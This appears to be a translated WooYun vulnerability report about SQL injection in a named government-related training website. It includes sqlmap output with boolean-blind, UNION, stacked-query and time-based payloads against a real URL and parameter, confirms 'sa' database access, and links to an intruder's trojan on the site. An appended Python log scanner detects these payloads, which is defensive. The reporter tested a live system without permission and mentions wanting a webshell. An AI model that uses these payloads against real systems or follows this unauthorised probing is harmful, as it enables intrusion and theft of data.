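2014-05-16: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2014-06-30: The vendor has actively ignored the vulnerability; details are disclosed to the public.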
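Hehe
WooYun admins, please take a good look and don't say the impact is small. It's all data, the black market's favorite!!!
1. I originally wanted to get a webshell before submitting, but on reflection, since this is a gov site, I decided to stop at the proof!
2. Because I found a trojan left by someone before me, I decided to submit right away (site admin, please check whether the database has been dumped)!
3. The impact is quite large: the injection runs with sa privileges and can reach across databases!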
Injection point: http://jxjy.yzrsks.com/news_view.jsp?Nid=59
Injection URL: http://jxjy.yzrsks.com/news_view.jsp?Nid=59

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:34:05

[22:34:05] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\jxjy.yzrsks.com\session' as session file
[22:34:05] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[22:34:05] [INFO] testing connection to the target url
[22:34:05] [INFO] heuristics detected web page charset 'GB2312'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Nid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Nid=59 AND 7243=7243

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: Nid=-5374 UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(112)+CHAR(100)+CHAR(103)+CHAR(58)+CHAR(120)+CHAR(106)+CHAR(99)+CHAR(85)+CHAR(116)+CHAR(120)+CHAR(110)+CHAR(73)+CHAR(89)+CHAR(109)+CHAR(58)+CHAR(119)+CHAR(112)+CHAR(100)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Nid=59; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Nid=59 WAITFOR DELAY '0:0:5'--
---
[22:34:05] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[22:34:05] [INFO] fetching current user
current user: 'sa'
[22:34:06] [INFO] Fetched data logged to text files under 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化版\rar\output\jxjy.yzrsks.com'
Trojan left by a previous intruder
http://jxjy.yzrsks.com/123.txt
Detailed description
Filter the input, check the server, and so on....
Unable to contact the vendor, or the vendor actively refused
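For the "check the server" step, the following added example (not part of the original report) scans web access-log lines for requests to news_view.jsp whose Nid value is not a plain integer and labels them with the payload classes seen in the sqlmap output above. It assumes a common-log-format access log; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Payload classes listed in the sqlmap output above, as case-insensitive patterns.
SIGNATURES = [
    ("stacked/time-based", re.compile(r"waitfor\s+delay", re.I)),
    ("union", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("boolean-blind", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP ranges), not taken from the real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2014:10:00:00 +0800] "GET /news_view.jsp?Nid=59 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2014:10:00:05 +0800] "GET /news_view.jsp?Nid=59%20AND%207243%3D7243 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2014:10:00:06 +0800] "GET /news_view.jsp?Nid=-5374%20UNION%20SELECT%20NULL%2CNULL HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2014:10:00:07 +0800] "GET /news_view.jsp?Nid=59%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2014:10:00:09 +0800] "GET /index.jsp?Nid=abc HTTP/1.1" 200 300',
]

def classify_nid(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]{1,9}", value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric"

def scan(lines, page="/news_view.jsp", param="Nid"):
    """Return (client, label, decoded value) for each suspicious request to page."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != page:
            continue
        # parse_qs percent-decodes the value, so encoded payloads are matched too.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify_nid(value)
            if label:
                findings.append((line.split()[0], label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(client, label, repr(value))
```

The integer-only rule in `classify_nid` is also the input filter the parameter needs on the server side; it does not replace parameterized queries in the JSP code.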